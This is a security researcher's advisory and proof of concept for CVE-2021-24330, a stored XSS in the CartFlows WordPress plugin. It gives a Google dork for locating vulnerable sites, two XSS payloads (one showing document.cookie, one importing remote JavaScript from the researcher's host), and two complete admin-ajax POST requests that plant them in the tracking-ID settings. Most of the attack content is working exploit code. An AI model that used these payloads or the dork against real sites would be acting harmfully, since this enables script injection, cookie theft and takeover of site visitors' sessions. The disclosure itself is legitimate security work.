/*!
- # VULNERABILITY: Funnel Builder by CartFlows WordPress Plugin <= 1.6.12 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/cartflows/
- # DATE: 2021-04-26
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: CartFlows Inc [ https://cartflows.com ]
- # SOFTWARE VERSION: <= 1.6.12
- # SOFTWARE LINK: https://wordpress.org/plugins/cartflows/
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24330
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the Funnel Builder by CartFlows plugin through v1.6.12 for WordPress.

[i] Vulnerable parameter(s): $facebook_settings['facebook_pixel_id'] (cartflows/classes/class-cartflows-tracking.php:64), $google_analytics_settings['google_analytics_id'] (cartflows/classes/class-cartflows-tracking.php:214).



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] 'm0ze'); alert(document.cookie); //('m0ze'

[$] ';import("https://m0ze.ru/payload/a2r.js");'



### -- [ PoC #1 | Authenticated Persistent XSS | Facebook Pixel ID: ]

[!] POST /wp-admin/admin-ajax.php?_locale=user HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------136768928210535225113059586199
Content-Length: 1787

-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking]"

enable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking_for_site]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking_for_site]"

enable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_id]"

'm0ze'); alert(document.cookie); //('m0ze'
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_initiate_checkout]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_add_payment_info]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_purchase_complete]"

disable
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="action"

cartflows_save_global_settings
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="security"

e918af4728
-----------------------------136768928210535225113059586199
Content-Disposition: form-data; name="setting_tab"

facebook_pixel
-----------------------------136768928210535225113059586199--



### -- [ PoC #2 | Authenticated Persistent XSS | Google Analytics ID: ]

[!] POST /wp-admin/admin-ajax.php?_locale=user HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------372833242730857634751324923175
Content-Length: 1814

-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics]"

enable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics_for_site]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[google_analytics_id]"

';import("https://m0ze.ru/payload/a2r.js");'
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_begin_checkout]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_add_to_cart]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_add_payment_info]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="_cartflows_google_analytics[enable_purchase_event]"

disable
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="action"

cartflows_save_global_settings
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="security"

e918af4728
-----------------------------372833242730857634751324923175
Content-Disposition: form-data; name="setting_tab"

google_analytics
-----------------------------372833242730857634751324923175--



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze